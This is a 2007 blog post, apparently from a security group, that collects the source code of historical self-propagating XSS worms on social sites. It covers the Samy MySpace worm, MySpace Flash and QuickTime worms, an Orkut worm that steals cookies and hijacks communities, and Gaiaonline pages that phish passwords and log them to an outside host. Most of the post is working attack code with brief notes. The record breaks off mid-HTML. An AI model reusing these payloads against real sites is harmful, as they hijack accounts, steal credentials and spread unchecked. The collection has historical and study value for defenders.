WormX

Mon, 22 Jan 2007 23:01:33 GMT

WormX is a collection of various notorious web worms mostly written on the top of popular client-side technologies and propagating primarily on social networking web sites.

For those of you who do not know what ajax worms are, here is a bit of Internet history:

In October 2005, a flaw in the MySpace's site design was exploited by a user only known as "Samy" to create the world's first self-propagating cross-site scripting worm. MSNBC has also reported that MySpace is a "hotbed" for spyware, and that infection rates are rising because of MySpace. In addition to this, the customization of user pages currently allows the injection of certain HTML which can be crafted to form a phishing user profile. Wikipedia

If you want to submit a worm, we are going to need the following information:

  1. Worm name - It must be enclosed inside <h3>[atom name here]</h3> tags.
  2. Worm description - It must start on a new paragraph.
  3. Worm code - It must be enclosed inside <pre><code>[atom code here]</code></pre> tags. If the worm is composed from more then one segments, each one of them must be separated by <em>[segment name or id]</em> on a new paragraph.
  4. Worm tags - It mus be a comma separated string.

Thanks for the contributions!

pdppdp

Samy

The first AJAX worm ever was Samy and it hit MySpace in October 2005. Here is the source code of the infamous worm. The worm propagates by taking advantage of MySpace not being able to sanitize JavaScript URLs in styles as it is shown above. The purpose of the worm is to infect other profiles and add Samy to their friends list.

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

MySpace, profile

pdppdp

Random MySpace Phish Worm

This is something picked up from packetstorm, a MySpace phish worm.

var up_sURL="http://cache.static.userplane.com/presence";
var up_dURL="http://feed.presence.userplane.com/presence";
var up_wmURL="http://www.myspace.com/userplane/ic.cfm";
var up_pServ="presence.userplane.com";
function up_launch(_1){
up_ow[_1]=up_ow[_1]==undefined?null:up_ow[_1];
if(up_ow[_1]==null||up_ow[_1].opener==undefined){
up_ow[_1]=window.open(up_wmURL+"?sendType=3&strEncryptedID="+up_sid+"&strDestinationUserID="+_1,"ICWindow_"+_1,"width=500,height=475,toolbar=0,directories=0,menubar=0,status=0,location=0,scrollbars=0,resizable=1");
if(up_ow[_1]==null){
up_notify(_1);
}else{
up_clear(_1,false);
}
}
}
function up_clear(_2,_3){
var l=up_la;
up_la=new Array();
var _5=false;
while(l.length>0){
var _6=l.pop();
if(_6.uid!=_2){
up_la.push(_6);
}else{
_5=true;
}
}
if(_5||!_3){
frames["up_lf"].location.href=up_dURL+"/o.php?sid="+up_sid+"&ou="+_2+"&forceClear="+(_3?"true":"false");
}
up_show();
}
function up_notify(_7){
var _8=true;
for(var i=0;i<up_la.length;i++){
if(up_la[i].uid==_7){
_8=false;
}
}
if(_8){
var _a=new Object();
_a.uid=_7;
_a.n="A website member";
up_la.push(_a);
}
up_show();
}
function up_show(){
var e=document.getElementById("up_nd");
if(up_la.length>0){
if(up_uid_display!=up_la[0].uid){
e.innerHTML="<div style=\"text-align:center\">"+(up_is_win_ie?"":"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td align=\"center\">")+"<table border=\"0\" cellpadding=\"2\" cellspacing=\"5\"><tr><td nowrap align=\"center\"><strong style=\"font-size:larger;\">Incoming IM Message</strong></td></tr><tr><td align=\"center\">"+up_la[0].n+" wants to IM you.<br>Would you like to accept?</td></tr><tr><td nowrap align=\"center\"><a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_launch( '"+up_la[0].uid+"' ); return false;\">Yes</a>           <a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_clear( '"+up_la[0].uid+"', true ); return false;\">No</a></td></tr></table>"+(up_is_win_ie?"":"</td></tr></table>")+"</div>";
up_uid_display=up_la[0].uid;
up_animate(200);
}
}else{
up_uid_display="";
up_animate(-200);
}
}
function up_animate(dY){
var e=document.getElementById("up_nd");
if(up_divY!=dY||up_la.length>0){
if(up_divY!=dY){
up_divY+=dY<up_divY?-10:10;
}
var px=up_divY+document.body.scrollTop+"px";
e.style.top=px;
clearTimeout(up_at);
up_at=setTimeout("up_animate("+dY+")",33);
}else{
e.style.top=dY;
}
}
function up_clean(_f){
var _10="";
for(var i=0;i<_f.length;i++){
var c=_f.charAt(i);
if((c>="A"&&c<="Z")||(c>="a"&&c<="z")||(c>="0"&&c<="9")){
_10+=c;
}else{
_10+="_";
}
}
return _10;
}
function receiveData(_13){
if(_13!=""){
var a=_13.split(",");
if(a.length>0){
while(u=a.shift()){
up_launch(u);
}
}
}
}
function URLencode(_15){
return escape(_15).replace(/\+/g,"%2B").replace(/\"/g,"%22").replace(/\'/g,"%27").replace(/\//g,"%2F");
}
function up_runPresence(sid,uid){
up_sid=URLencode(sid);
up_divY=-200;
up_la=new Array();
up_ow=new Object();
up_uid_display="";
document.write("<iframe name=\"up_lf\" id=\"up_lf\" style=\"position:absolute; top: -200px; z-index:9998; width:100px; height:100px; border: 0px\" src=\"\"></iframe>");
document.write("<div id=\"up_nd\" style=\"position:absolute; width:250px; z-index:111111; left: 30px; top: -200px; background-color:#eeeeee; border: 1px solid #000000;\"></div>");
if(up_sid!=""){
var _18="server="+up_pServ+"&uid="+up_sid;
document.write("<div id=\"flash\" style=\"position:absolute; width:100px; z-index:9996; top: -200px;\"><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" id=\"presence\" width=\"1\" height=\"1\" align=\"middle\"><param name=\"allowScriptAccess\" value=\"anyDomain\" /><param name=\"movie\" value=\""+up_sURL+"/presence.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"flashvars\" value=\""+_18+"\" /><embed src=\""+up_sURL+"/presence.swf\" flashvars=\""+_18+"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"1\" height=\"1\" swLiveConnect=true id=\"presence\" name=\"presence\" align=\"middle\" allowScriptAccess=\"anyDomain\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" /></object></div>");
}
}
var up_sid=null;
var up_divY=null;
var up_la=null;
var up_uid_display=null;
var up_at=null;
var up_ow=null;
var up_agt=navigator.userAgent.toLowerCase();
var up_appVer=navigator.appVersion.toLowerCase();
var up_is_mac=up_agt.indexOf("mac")!=-1;
var up_is_safari=up_agt.indexOf("safari")!=-1&&up_is_mac;
var up_is_khtml=up_is_safari||up_agt.indexOf("konqueror")!=-1;
var up_is_ie=up_appVer.indexOf("msie")!=-1&&up_agt.indexOf("opera")==-1&&!up_is_khtml;
var up_is_win=up_is_mac?false:(up_agt.indexOf("win")!=-1||up_agt.indexOf("16bit")!=-1);
var up_is_win_ie=up_is_win&&up_is_ie;

MySpace, phishing

pdppdp

The infamous MySpace Flash Worm

The worm works by emebeding flash content that opens a URL once the movie is in action. This is achieved via "getURL" method. The getURL redirects the user to a blog page where another flash component opens a javascript URL that is evaluated inside MySpace context. More information about this worm can be found here.

state1: open remote URL

getURL("url");

stage2: evaluate a javascript URL

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'
http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);
x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'<br>\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'<br>\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");

MySpace, flash, getURL

pdppdp

MySpace QuickTime Worm

Billy Hoffman from SPI has an analysis of the MySpace QuickTime Worm here. The worm makes use of a QuickTime XSS flow discussed here.

/*
 * Source code received from BurntPickle (http://www.myspace.com/burntpickle)
 * 
 * Comments and formating by SPI Dynamics (http://www.spidynamics.com)
 * This code may be republished as long as the above text is kept
 */

/*

This JavaScript was inside of a Quicktime movie. It uses a
feature known as HREF tracks (http://www.apple.com/quicktime/tutorials/hreftracks.html)
which allows Quicktime to load new movie files, webpages or
run JavaScript. The worm's author created an empty Quicktime
movie that contains an HREF grack that would automatically
execute this JavaScript.

This code served as a bootstrap to load the full malware
code from a 3rd party webserver. This is most likely due to
length limitations for URLs in HREF tracks. 

*/

javascript:

void((
function() {
    //create a new SCRIPT tag
    var e=window.document.createElement('script');
    var ll=new Array();
    ll[0]='http://www.daviddraftsystem.com/images/';
    ll[1]='http://www.tm-group.co.uk/images/';
    
    //Randomly select a host that is serving the full code
    //of the malware
    var lll=ll[Math.floor(2*(Math.random()%1))];
    //set the SRC attribute to the remote site
    e.setAttribute('src',lll+'js.js');
    //append the SCRIPT tag to the current document. The
    //current document would be whatever webpage contains
    //the embedded movie, in this case, a MySpace profile page
    //This causes the full code of the malware to execute.
    window.document.body.appendChild(e);
})
The code downloaded from the randomly selected servers plus comments:
/*
 * Source code received from BurntPickle (http://www.myspace.com/burntpickle)
 * 
 * Comments and formating by SPI Dynamics (http://www.spidynamics.com)
 * This code may be republished as long as the above text is kept
 */

//========================================================
//======================================================== Functions
//========================================================

//It is odd that the author uses both literal JavaScript functions and
//anonymous functions

/*
 doEdit - Edits someone's profile to infect them with the Quicktime file
          and the HTML to overwrite the top menu with a phishing menu
params:
    oXML - An XHConn object that has received a response
returns: void
          
*/
var doEdit=function(oXML){
    //extract the friend id from the current page
	var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));

	if(friendid){
	    //extract the old values for the various profile fields
		var theviewstate = encodeURIComponent(findContents(oXML,'__VIEWSTATE','\" />', 37));
		var thehash = encodeURIComponent(findContents(oXML,'editInterests_hash','\" />', 27));
		var headlinetext = encodeURIComponent(findContents(oXML,'editInterests$HeadlineText','\" maxlength', 47));
		var aboutmetext = encodeURIComponent(findContents(oXML,'editInterests$AboutMeText','</textarea>', 127));
		var liketomeettext = encodeURIComponent(findContents(oXML,'editInterests$LikeToMeetText','</textarea>', 133));
		var generaltext = encodeURIComponent(findContents(oXML,'editInterests$GeneralText','</textarea>', 126));
		var musictext = encodeURIComponent(findContents(oXML,'editInterests$MusicText','</textarea>', 122));
		var moviestext = encodeURIComponent(findContents(oXML,'editInterests$MoviesText','</textarea>', 124));
		var televisiontext = encodeURIComponent(findContents(oXML,'editInterests$TelevisionText','</textarea>', 132));
		var bookstext = encodeURIComponent(findContents(oXML,'editInterests$BooksText','</textarea>', 122));
		var heroestext = encodeURIComponent(findContents(oXML,'editInterests$HeroesText','</textarea>', 124));
		if('%22%20maxleng' == headlinetext) {
			headlinetext  = '';
		}

        //Checking if this profile already has a reference to the quicktime movie, and thus if has this profile
        //already been infected. This is used later
		var c = moviestext.indexOf("piAF2iuswo.mov");
        
		var urlpost = 'http://' + document.location.host + '/Modules/ProfileEdit/Pages/Interests.aspx?fuseaction=profile.interests';

        //Update the profile with our infected content
        //Note that all the controls start with the same prefix. The author could have
        //stored this prefix in a string to make the virus smaller.
		var postinfo = "__VIEWSTATE=" + theviewstate
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24hash=" + thehash
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24SaveTop=Save+All+Changes"
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24HeadlineText=" + headlinetext
		//Here the HTML for the top menu with Phishing links is inserted into the profile
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24AboutMeText=" + aboutmetext + cc[0]
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24LikeToMeetText=" + liketomeettext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24GeneralText=" + generaltext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24MusicText=" + musictext
		//Here a reference to the quicktime movie is inserted
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24MoviesText=" + moviestext + cc[3]
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24TelevisionText=" + televisiontext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24BooksText=" + bookstext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24HeroesText=" + heroestext;

        //The author is checking if this profile has already been infected. Really, this check should have been
        //perform at the start of function. This would have made the virus faster by not having to perform
        //needless string operations.
		if(-1 == c) {
		    //if profile has not been infected, update the profile with infected content.
			editProf.connect(urlpost,"POST",postinfo,friendsWrapper);
		}
	}
};

/*
 doMessage - Tries to send a message to another MySpace user
             with a link to a pornographic website
params: none
returns: void
          
*/
function domessage() {
    //for all the iframes that were created to send a message
    for(var y=0;y<ap.length;y++) {
	    if(-1!=window.frames['qtkt'+y].document.body.innerHTML.indexOf('ctl00$ctl00$Main$Main$sendMessageControl$subjectTextBox')) {
	        //populate the subject with a random message
		    window.frames['qtkt'+y].document.forms[1].ctl00$ctl00$Main$Main$sendMessageControl$subjectTextBox.value=su[Math.floor(6*(Math.random()%1))];
			//insert a pornographic picture which links to a pornographic website
			window.frames['qtkt'+y].document.forms[1].ctl00$ctl00$Main$Main$sendMessageControl$bodyTextBox.value=cc[2];

			//The below line of code would send the message to a MySpace user.
			//in the copy of the code I received, this line was commented out
			//because of this, it appear the worm didn't actually send the messages

			//window.frames['qtkt'+y].document.forms[1].btnSend.click();
        }
    }
}

/*
findContents - Extracts a substring that occurs between two other strings
params:
    oXML - An XHConn object which has returned a response
    start - first string to look for
    end - string to find that occurs after the start string
    offset - offset between the two string to begin extracting at

returns: Extracted contents or an empty string
          
*/
var findContents=function(oXML,start,end,offset){
	var s,e,n;
	s=oXML.responseText.indexOf(start)
	//only keep looking if we found the start string
	if(-1!=s) {
		e=oXML.responseText.indexOf(end,s);
		n=oXML.responseText.substring(s+offset,e);
        //this undoes an HTML entity conversion, because the text was reflected inside a Textbox and
        //had entities applied to it when returned from MySpace
		return n.replace(/</g,"<").replace(/>/g,">").replace(/"/g,"\"").replace(/&/g,"&");
	}
	return '';
};

/*
friendsWrapper - Unknown. The source code I received simply had an empty function
                 with a comment. This might just exist because a callback function
                 is needed for the XmlHttpRequest that is made to update the profile
          
*/
var friendsWrapper=function(oXML){
	// removed for now
}

/*
XHConn - Creates a new XHConn object, which extends the XmlHttpRequest object. It
         handles creating an XHR in a cross platform manner, and creates a wrapper
         that handles onreadystatechange.

returns: XHConn object
          
*/
function XHConn() {
    //this may be a mistake, because these variables
    //are declared as global variables instead of properties
    //of the XHConn object
	var xmlhttp, bComplete = false;

    //Create XHR, regardless of browser
	try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
	catch(e) {
		try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
		catch(e) {
			try { xmlhttp = new XMLHttpRequest(); }
			catch(e) { xmlhttp = false; }
		}
	}
	if(!xmlhttp) return null;
	
	/*adds a connect method
	
	  params:
	    sURL - URL to send request to
	    sMethod - HTTP method to use, if not GET, assumes POST
	    sVars - PARAMETERS
	    fnDone - function to callback once connection is completed
	*/
	this.connect = function(sURL, sMethod, sVars, fnDone) {
		if(!xmlhttp) return false;
		bComplete = false;
		sMethod = sMethod.toUpperCase();
		try {
		    //if it is a get, we send no parameters
			if(sMethod == "GET") {
				xmlhttp.open(sMethod, sURL, true)
				sVars = "";
			} else {
			    //else sent the appropriate headers for a POST
				xmlhttp.open(sMethod, sURL, true);
				xmlhttp.setRequestHeader("Method","POST "+sURL+" HTTP/1.1");
				xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
			}
			//Wrap the onreadystatechange and make sure that that the request has completly returned
			xmlhttp.onreadystatechange = function() {
			    //normally a check for statuscode == 200 is done here, but for some reason they didn't
				if(xmlhttp.readyState == 4 && !bComplete) {
					bComplete = true;
					fnDone(xmlhttp);
				}
			};
			//send the request
			xmlhttp.send(sVars);
		} catch(z) { return false; }
		return true;
	};
	return this;
}

//========================================================
//======================================================== Global Variables
//========================================================

//the content the worm needed (Phishing pages, malicious Quicktime movie, JavaScript code, etc)
//was stored on multiple servers. The worm randomly selects one to use
var ll=new Array();
ll[0]='http://www.daviddraftsystem.com/images/';
ll[1]='http://www.tm-group.co.uk/images/';
var lll=ll[Math.floor(2*(Math.random()%1))];

//this is an array containing different phrases to use as the subject of a message to other MySpace
//users
var su=new Array();
su[0]='what else is there to do on a Sunday.?.......';
su[1]='You better not forget about this..';
su[2]='Hehe that was so funny..';
su[3]='better see this one last time lol..';
su[4]='omg did you see this last nite..';
su[5]='whos coming to the party tonight.?..';

//This array contains various payloads used by the worm
var cc=new Array();
//This is the HTML used to hide the old top menu bar and replace it with a menu pointing to a fake login page
cc[0]='<style type="text/css">\n'
+'div table td font { display: none }\n'
+'div div table tr td a.navbar, div div table tr td font { display: none }\n'
+'.testnav { position:absolute; top: 136px; left:50%; _top: 146px }\n'
+'</style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style="">'
+'<a href="'+lll+'login.html" target="" class="navbar">Home</a> | <a href="'+lll+'login.html" target="" class="navbar">Browse</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Search</a> | <a href="'+lll+'login.html" target="" class="navbar">Invite</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Film</a> | <a href="'+lll+'login.html" target="" class="navbar">Mail</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Blog</a> | <a href="'+lll+'login.html" target="" class="navbar">Favorites</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Forum</a> | <a href="'+lll+'login.html" target="" class="navbar">Groups</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Events</a> | <a href="'+lll+'login.html" target="" class="navbar">Videos</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Music</a> | <a href="'+lll+'login.html" target="" class="navbar">Comedy</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Classifieds</a></div></div>'; //profile
//This is the body of the message sent to other MySpace users. It contains a pornographic picture and a link to a pornographic website
cc[2]='<a href="http://google.com/url?q=http://www.vidchicks.com/home.php"><img border="0" src="http://img453.imageshack.us/img453/5603/youtubedt7rf2.jpg">'; //mesages
//This is HTML added to a profile with a link to the malicious Quicktime movie. It uses styles to try and hide itself from the user
cc[3]='<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed src='+lll+'piAF2iuswo.mov /></div>'; // profile inf


//========================================================
//======================================================== Code Execution Starts Here
//========================================================

//Please note that all variables declared here are global variables, as
//JavaScript does not have block level variable scope. This allows functions
//like doMessages() to access variables created here.

// Malware will execute only if variable editProf is not defined.
// Once the worm runs it defines this variable. This serves as a kill switch
// by preventing the virus from running multiple times on the same page
if((typeof editProf == "undefined") && (top == self)) {
	var ap=new Array(4);
	var fi=new Array(4);
    //This code picks 4 MySpace users at random and sets up code to
    //send them a message
	for(var x=0;x<ap.length;x++) {
	    //randomly generate a friend ID
		var ran_unrounded=80000000+(105000000-80000000)*Math.random();
		var ran_number=Math.floor(ran_unrounded);
		fi[x]=ran_number;
        //build a hidden iFrame. This will be used to send a message to a MySpace user
		ap[x]=document.createElement('iframe');
		ap[x].height=1;
		ap[x].width=1;
		ap[x].name="qtkt"+x;
		ap[x].id="qtkt"+x;
		document.getElementsByTagName('body')[0].appendChild(ap[x]);
		ap[x].src='http://profile.myspace.com/index.cfm?fuseaction=mail.message&friendID='+fi[x];
	}
    //In 6 seconds, execute the domessage() function. this will (try) to send messages to the randomly
    //selected people.	
	setTimeout("domessage()",6000);
    //create a new instance of XHconn. This also prevents the worm from running again on the same page
	var editProf = new XHConn();
    //Go fetch a the edit page for the user's profile and call the doEdit() function when you receive a response
	editProf.connect('http://'+document.location.host+'/Modules/ProfileEdit/Pages/Interests.aspx',"GET","",doEdit);
}

MySpace, QuickTime, QTL, MOV, GNUCITIZEN

pdppdp

The ORKUT Worm

A worm was spreading on Google ORKUT. Analysis from Billy Hoffman.

var uid="6611314433566349528"; // Exploit escrito por Rodrigo Lacerda
//window.alert('injetado');

function createXMLHttpRequest() 
{
   try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
   try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
   try{ return new XMLHttpRequest(); }catch(e){}
   return null;
}

function getCookies()
{
	subject="Orkut Cookie Exploit";
	dcookie=document.cookie;
	if(dcookie.indexOf('state') > -1)
	{
		mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
	}
	else
	{
		mensagem = "Este usuario usa Internet Explorer e a funcao de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
	}
	check_scraps();
};
getCookies();

function velocity_transfer()
{
	send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
	var xml= createXMLHttpRequest();
	xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
	xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
	xml.send(send);xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlrtr=xml.responseText;
			x++;
			if(x<cmm.length)
			{
				velocity_transfer();
			}
		}
	};
};

function array_cmm()
{
	var xml2= createXMLHttpRequest();
	xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
	xml2.onreadystatechange=function()
	{
		if(xml2.readyState==4)
		{
			var xmlr=xml2.responseText;
			if(!xmlr.match(/textPanel/gi))
			{
				cont=xmlr;
				ini=cont.indexOf('<DIV id=ownedCommunities') > -1 ? cont.indexOf('<DIV id=ownedCommunities') : cont.indexOf('<div id="ownedCommunities"');
				fim=cont.indexOf('<DIV id=pendingCommunities') > -1 ? cont.indexOf('<DIV id=pendingCommunities') : cont.indexOf('<div id="pendingCommunities"');
				cont2=cont.substring(ini,fim)
				cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
				cmm=cmm.split(',');
				if(cmm)
				{
					velocity_transfer();
				}
			}
			else
			{
				array_cmm();
			};
		};
	};
	xml2.send(null);
};

function send_message()
{
	send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
	var xml= createXMLHttpRequest();
	xml.open('POST','http://www.orkut.com/Compose.aspx',true);
	xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
	xml.send(send);xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlrtr=xml.responseText;
			if(!xmlrtr.match(/textPanel/gi))
			{
				array_cmm();
			}
			else
			{
				send_message();
			}
		}
	};
};


function check_scraps()
{
	x=0;
	var xml=createXMLHttpRequest();
	xml.open("GET","Scrapbook.aspx",true);
	xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlr1=xml.responseText;
			if(!xmlr1.indexOf('textPanel') > -1)
			{
				SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
				POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
				send_message();
			}
			else
			{
				check_scraps();
			}
		};
	};
	xml.send(null);
};    

// Exploit escrito por Rodrigo Lacerda

ORKUT, Google

pdppdp

Gaiaonline Worm

On 4th Jan 2007 Gaiaonline.com is hit by a worm.

log.php

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php 
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Write string to file.
fwrite($fh, $stringData);
// Add a tilde followed by newline to divide each entry.
$stringData = "~\n";
fwrite($fh, $stringData);
fclose($fh);

?>

start.js

// Content to replace div "content" with. 
var newContent = '<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">	<tr>	<td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td>	</tr>	<tr>		<td align="center"><img src="http://graphics4.gaiaonline.com/images/template/header/header_sign_in_large.gif" width="203" height="30"></td>	</tr>	<tr>		<td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td>	</tr></table><table width="721" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/table/border_top_stationary.gif" width="721" height="1"></td></tr></table><table width="721" border="0" cellspacing="0" cellpadding="5" background="http://graphics4.gaiaonline.com/images/template/bg/stationary.gif" align="center"><tr><td><table width="710" border="0" cellspacing="0" cellpadding="4"><form action="http://gaiaonli.site.com/log.php" method="post" target="_top" name="loginForm"><tr><td align="center"><span class="normbold">Username: </span><input type="text" name="username" size="25" maxlength="40" class="vendform" value="Anonymous" /></td></tr><tr><td align="center"><span class="normbold">Password: </span><input type="password" name="password" size="25" maxlength="25" class="vendform" /></td></tr><tr><td align="center"><span class="normbold">Log me on automatically each visit:</span><input type="checkbox" name="autologin"/></td></tr><tr><td align="center"><input type="hidden" name="sid" value="57181309749d15ca59db5332a46e673f" /><input type="hidden" name="redirect" value="" /><input type="submit" name="login" class="mainoption" value="Login" /></td></tr><tr><td align="center"><span class="normbold"><a href="/account/index.php?mode=sendpass" class="gensmall">I forgot my password</a></span></td></tr><tr><td align="center"><span class="normbold">Account activation problems? Click <A HREF="http://www.gaiaonline.com/info/feedback.php">here</A>.</span></td></tr></form></table></td></tr></table><table width="721" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/table/border_bottom_stationary.gif" width="721" 